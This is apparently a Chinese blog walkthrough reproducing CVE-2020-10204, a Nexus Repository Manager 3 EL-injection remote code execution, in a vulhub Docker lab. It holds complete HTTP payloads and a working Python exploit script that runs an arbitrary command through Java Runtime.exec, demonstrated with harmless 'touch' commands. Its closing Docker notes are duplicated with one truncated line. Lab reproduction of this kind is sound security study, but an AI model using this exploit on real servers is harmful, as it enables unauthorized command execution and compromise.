声明
好好学习,天天向上
漏洞描述
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。
影响范围
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1
复现过程
这里使用3.21.1版本
使用vulhub
cd /app/vulhub-master/nexus/CVE-2020-10204
使用docker启动
docker-compose up -d
等待一段时间环境才能成功启动,访问如下链接即可看到Web页面。
http://your-ip:8081
该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码admin:admin登录后台(右上角Sign In)。
登录后,还需要再做一些配置,改密码吖等等
后完后,在登录状态随便一个页面刷新,抓包,获取当前用户的Cookie
然后把Cookie和CSRF Token和替换到下面POC中
POST /service/extdirect HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 219
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f
Connection: close
{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{3*2}"]}],"type":"rpc","tid":11}
注意一点,换的时候,要改的东西如下,我是试了很多次,才成功
直接上exp,这个exp其实就和我们正常发包一样,先看exp把,我是在git大佬的基础上修改的,注意我们用的时候把里面的NX-ANTI-CSRF-TOKEN和Cookie内容都替换了,替换的原则和上面POC的原则一样
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
import sys
import requests
if len(sys.argv)!=3:
print('+---------------------------------------------------------------------------------------------------------+')
print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +')
print('+ CVE-2020-10204 Nexus Repository Manager 3 Remote Code Execution +')
print('+---------------------------------------------------------------------------------------------------------+')
print('+ USE: python3 <filename> <url> <cmd> +')
print('+ EXP: python3 cve-2020-10204_exp.py http://ip:8081 "touch /tmp/233" +')
print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 +')
print('+---------------------------------------------------------------------------------------------------------+')
sys.exit(0)
url = sys.argv[1]
vuln_url = url + "/service/extdirect"
cmd = sys.argv[2]
headers = {
'accept': "application/json",
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
'NX-ANTI-CSRF-TOKEN': "0.4256948739162416",
'Content-Type': "application/json",
'Cookie': "NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f"
}
data = """
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}"],"roles":[]}],"type":"rpc","tid":89}
""" % cmd
r = requests.post(url=vuln_url, headers=headers, data=data, timeout=20)
if r.status_code == 200:
if "UNIXProcess" in r.text:
print ("[+] Command Executed Successfully (Not Echo)")
else:
print ("[-] Command Execution Failed")
else:
print ("[-] Target Not CVE-2020-10204 Vuln Good Luck")
替换后,执行
python3 cve-2020-10204_exp.py http://192.168.239.129:8081 "touch /tmp/233"
同样的道理,我们可以模拟发包
BP中发送一下数据包,和POC一样,替换该替换的地方
POST /service/extdirect HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 314
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f
Connection: close
{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]}],"type":"rpc","tid":11}
和POC不一样的地方就是,把
$\\B{233*233}
替换成
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}
一定注意,各位在复制我的POC或者EXP时,发送请求的header里面的NX-ANTI-CSRF-TOKEN还有Cookie都要改,细心地小伙伴会发现,我的都改了,而且都一样
使用完后关闭镜像
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
ocker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down